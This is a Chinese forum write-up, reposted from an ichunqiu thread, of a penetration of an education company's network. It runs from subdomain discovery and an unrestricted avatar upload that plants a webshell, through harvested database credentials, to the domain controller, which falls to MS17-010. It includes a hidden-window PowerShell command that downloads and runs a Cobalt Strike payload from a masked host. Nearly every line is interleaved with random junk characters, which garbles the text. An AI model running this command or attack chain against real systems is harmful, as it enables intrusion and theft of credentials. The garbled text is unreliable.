* q. t1 f9 p7 g8 J# w6 Q
这次渗透是一个从0到1,从外网到拿下域控的实战过程,希望可以给大家一些思路
9 G6 N0 Z! v- s s* [9 n/ f
% O6 ]* ^) k7 }5 J
* h% t! I' Q4 f+ n
$ Q$ R5 {' G/ V$ P9 e/ c+ ]
3 T2 ?5 D& Y/ ?1 l T
) `7 s' n5 s& u+ S; _* Y' F0 `+ i: g 正文+ F; `: Z/ x) e& C U& U
# P7 G! ?4 R/ _4 h1 ^* }8 Q6 R
W' z( f! K% N0 B) J# A( F! P 2 \, |) W: d4 Y2 E! z% `: v
& T7 ?3 P7 H8 d2 \& a. G
[9 c4 d$ {$ l 目标:www.xxxx.com(一家教育机构) % T, f8 w7 `$ L6 L
打开是一个登录框,只能是手机号+密码或者手机号+验证码且并未开放注册功能
3 `3 E S1 l) V- x: Z 9 F" f4 f4 E" t
5 Y$ K# d0 I1 X+ t1 u 4 a4 T% q* ~. z/ l) T! O. N; R, `4 Q
. l; v5 {* [1 f# J W
! U5 U0 v. @3 x& W. l 进行了简单的信息搜集
) a+ [9 _0 q. E$ E8 F! [6 k' T. q : F5 a$ e1 ^9 j0 @6 Y7 F# Z) x
, K" n) v3 W; U3 ?& S" C) Q7 v
1 O) X* V3 }3 _. J& x
. K0 b8 d) b& l s# X' a5 P 子域名搜集9 v% y" J% F2 {& j7 z. e
) N) }$ ~+ F. B
$ B( M0 X3 W `. Q
$ l1 k o0 H5 ~' h2 @5 {
2 u& A( M Z8 @9 i; X
3 G1 z/ s' V, R# M5 m- P7 U fofa找资产
0 z. i, v! s' _0 R% G% v. z ' C, B! V# @) |5 T- }7 G+ B. ?
: `& i5 |* m! P3 K$ S. W 0 o* B$ Y3 X) @$ S: P1 b& Z
) a5 C% d5 E) {3 r
* J: p# v7 T# T) T- [# a1 ^/ D
' o0 Z7 s1 z) a7 ?. z1 n( y; O/ k+ P; ` o# ^+ W# a D0 m
一共七个资产。去重之后只有两个。
# S1 f+ Y+ c( b
2 ]" u9 \6 U: m* O, k. b! w8 w: V, j1 T$ ]$ J: P. m
G0 O& a8 J4 b& @& `7 D
- z1 Q8 E8 i* j 目录探测
1 ~" M% J$ U$ |1 m9 V / I$ G: x+ m, e! n: y1 h4 C
* m9 m0 K! r! @+ }7 o5 J . @- e t) N) f4 P5 }7 i
- b) S% ?( a# ~
: v' Y, ?7 }* I
我尝试了暴力枚举,看有没有弱口令之类的,然而并没有
2 l/ N8 z6 d' ^4 @3 @* J. w+ c 6 }% _8 E+ e1 ~: f+ y1 D4 N$ R
/ h' \. d# C0 _6 _- H
* b- D" T' a G$ u
9 [9 M: s: ~ h$ t/ ^3 K) m 我又尝试了通过修改返回包来绕过登录界面
/ q" U+ ]: [! x O 2 r, B9 b$ @) l: r
9 v& J/ u9 E5 {+ t0 H4 o& Y+ ]
5 ]3 i3 N$ t: ~2 k& P; E & Q0 c C/ Y+ j
' z& \1 y, |2 c" k( \$ p# u7 J 还是不行,尝试注入无果
) T; u% Z- T* \& J / J: O4 I% E4 E3 B/ j4 Q
+ U; n2 k! s o- |3 I & N) j/ V8 y' l2 B5 h
$ {2 C0 t; V/ S0 _ t# u: x
% I, o D( v2 ~: G4 D 不过我目录探测出了一处Spring信息泄露 3 v* G* ]/ [2 D+ I
! }4 p# `6 c3 e. g& Z# U5 O7 B4 v/ S t1 f9 E/ O
9 C; b/ v: \5 t
?& L0 {( K3 N0 k& N$ A. y; J
& E& k7 Z' ~& _0 r* E% C 4 n8 p9 s: f' c2 k
% e, [) u2 _3 i1 t9 z
尝试Spring RCE无果,想通过trace目录下替换cookie实现登录,但是发现删除了这个目录
7 p5 d7 {; {! y: _. g5 l' e2 l % ?+ u% v( p) g" B/ Q; K4 [
l0 G0 H* @ F2 Z1 K1 I2 m / U" M( Q& G3 J" _5 X$ s( @# k. ~2 }
4 }+ J$ x5 \, r. P3 T
' [5 M5 W+ Y( e 后对公众号进行了简单的信息搜集,针对公众号搜集时,尽量找后面认证过的进行渗透。
& n- T y. ^8 x * i% W; e9 ~. y7 m- G( N
! l: x2 [2 v! I : G. v) W6 g- I% e. ]+ ^0 o
% I; {) j4 z5 {) l( f- l& j: c5 R
7 p5 G# [7 c, Y) [- | F0 D+ G1 _
获取有些师傅到这一步就手机抓包电脑测了。
0 r& s8 @+ H G$ D % m6 A& R1 u" o8 o7 I% j$ q
9 H1 H u0 Z' X8 G' H" j# E$ q
Windows新版微信可以抓取公众号和小程序的包,只需要把IE代理配置一下即可。
0 d' \$ V `1 o! Y+ u' y. s2 j) b 6 F: I- p, _/ ]/ D, M
; T1 F- z I, d3 P2 H, F# V 其中在一个公众号发现了小程序,可以进行注册。
; T8 _, M% K0 `. P+ r% [# y' y k. d% |+ `' U' Z5 d5 v. y' W; j
9 U' d$ [( k; d( i$ [0 }
看到了头像上传,尝试上传获取WebShell: @7 \. \5 r- u) K( y5 |3 Z9 Y
; l; P5 Q0 p5 P4 b/ o/ p" W( m0 c8 Y" j& {, z3 Z3 i
3 P# ~) ~; S0 U# u
7 h; c/ u, Q5 t' b, E
+ b/ g% s( {8 I% M( X
未做任何限制成功GetShell,上了冰蝎马,目录没权限访问
* k, ~) w* e2 G, ~
- `& e5 D" r( ~1 Q, ], o
}! }, J( k. j 0 P) D! U2 U# t. n
: n" ~, c: Z" d( a0 O$ p! g
7 M" F5 a. `1 @6 A4 c+ w
然后上了大马
8 f% I( E5 y. G( h% h + W. W7 \- s6 n6 u1 t/ \4 L# u
" F; c) G+ p2 C* A/ r9 h6 u# I4 Z' s+ H1 t
+ x) D% B- y& n$ U* Y& x* W, P 3 K& `- U' P2 \) K# [
5 {3 |% G; N' R0 W0 b: T
/ Q3 v5 }& g# x, j x
" t2 l. T6 z( }6 g
5 c/ H" h/ S& j) i/ e 通过翻找文件发现数据库账号密码. y8 J9 i; h8 g2 U& ]
; K: }* ^ }( b
& [& m! F* z0 T# x2 J
7 o2 R/ H9 _8 k$ K2 J9 x
& w1 u' ?$ {4 |' N! t+ p3 X& E! R6 }+ X/ e! R3 T
--内网渗透
) ^7 `& [* W. k5 c0 @1 [ . Y+ ^, z+ D! d4 Z: [
7 G3 \2 d; Y( Z) Q$ t( o 直接通过powershell执行 cs上线7 d3 @$ n+ z# ~# V' {5 Z# F
6 o! I4 @/ ^; o* B. o& {) J$ w
& f( g8 D3 E5 s6 k' [- v powershell.exe -nop -w hidden -c "IEX ((new-object net.webclient).downloadstring('http://xxxxxxxxxxxxx/a'))"
. R) b7 ~& n/ y1 f. U3 X
9 `7 Z7 I. F0 C8 y' E }( ]& L1 _3 h T4 V5 A& J9 r/ R/ j9 V
+ [: r$ I& ^) n T3 T9 p$ {
3 z2 x- p* _, e0 l. S9 w
/ M7 A" R: w& d) ^ 进入内网后,简单的进行一波信息收集,寻找域控并对服务器段进行弱口令爆破
7 P$ R: B/ h8 f( N 0 p7 Z( S4 ]) g2 Q8 U
0 R2 B V* K4 k+ D- `
$ T( u: g( s. P$ c" B9 a
3 E: @% X( t5 A( i( L1 J) p& c, u. q5 y! t
登录爆破出来的服务器,发现多网卡且存在逻辑隔离。 # P8 c+ q: T% W5 ?
' x1 K; c; f9 f5 P! B1 T" a # h: N: T8 G5 x/ N7 ]
8 A4 L) m2 v+ t. y9 v
9 \# S3 J v6 ^; P" I' n$ |# Q: y2 ]. k: H
# x2 f Z1 ]9 T( m4 A/ w9 T8 `
; {+ G& [, ^! q$ G% {) i5 y: Q+ a# a4 a
通过跳扳机能通域控,发现域控server2008且存在ms17010,直接一把梭 - I9 {/ q% O* f+ S O! m7 i+ X
J& \; d. o$ V$ z7 y
6 ^* C3 u! b9 M8 S, w3 e " q+ g, _& [! i! j" V ?! Q! U0 Q
, ^4 I5 M: Z+ K+ ~
0 |( `+ \! m6 {
6 r: k. }7 Q- C$ D5 F1 Q( V5 U$ ~9 u# R4 r* G2 _/ v8 A
( X/ S. Y2 w; M P
4 K2 z9 ?# }; E, Q. R% A: w! G+ ^
?6 ^3 p" R m* s
' W; ~+ H7 x" a5 Y4 \* N c
. j2 F- ^# T/ Y6 U
6 u7 U; C8 S* Y2 y8 |: u$ J $ c$ q9 X: S: M) N; W$ s
K6 N; r. @" u% U. h- f4 \
小结
M: K" V8 L; { S+ }, S * j3 H( ?! \0 o8 o" n9 t8 X, I
1 ^/ r. a7 a9 |0 L9 W \
% G' o! K9 u5 v5 n) _2 V! J: R
+ V' |6 K) C) _% G$ R" D& A" X
* i: Q% ^7 u: Z& ]4 ^6 Y+ s 在渗透测试过程中,信息收集很重要,细心和耐心也是不可缺少的,总得来说,这次的渗透测试总的来说比较顺利,希望可以给大家带来一些思路!
" f( i9 L* ~4 _3 W3 U3 J : k% d! A) A! ^2 @
- S! E8 B0 e, a# D& n: F1 n$ a' Z
* J0 I6 h" M( `
# n2 G- A$ B: y* D' D3 w3 `* n0 r, i; J4 P8 Y }+ p
- ! f4 I' t6 f6 v6 i1 @/ r
; T( }4 N+ q" X7 Z* K+ j
+ e6 L _& ^8 R6 p: b: x+ O' l8 G
-
) T5 o; \6 i. R0 N + X( u/ V" c1 c4 \5 K& a
$ y( q( U) f2 }% J 8 ?# N V. m' W. {( O
4 y( M5 V4 m+ w) f" A 作者:Xm4FDf转载自:https://bbs.ichunqiu.com/thread-57879-1-1.html/ c8 p2 ^- ^* u2 T
/ E! \- j& D* t" k) G+ l
/ w3 j2 g" C" Q* I& V
& N) k! G. V. ^/ i) X, n; q$ \ |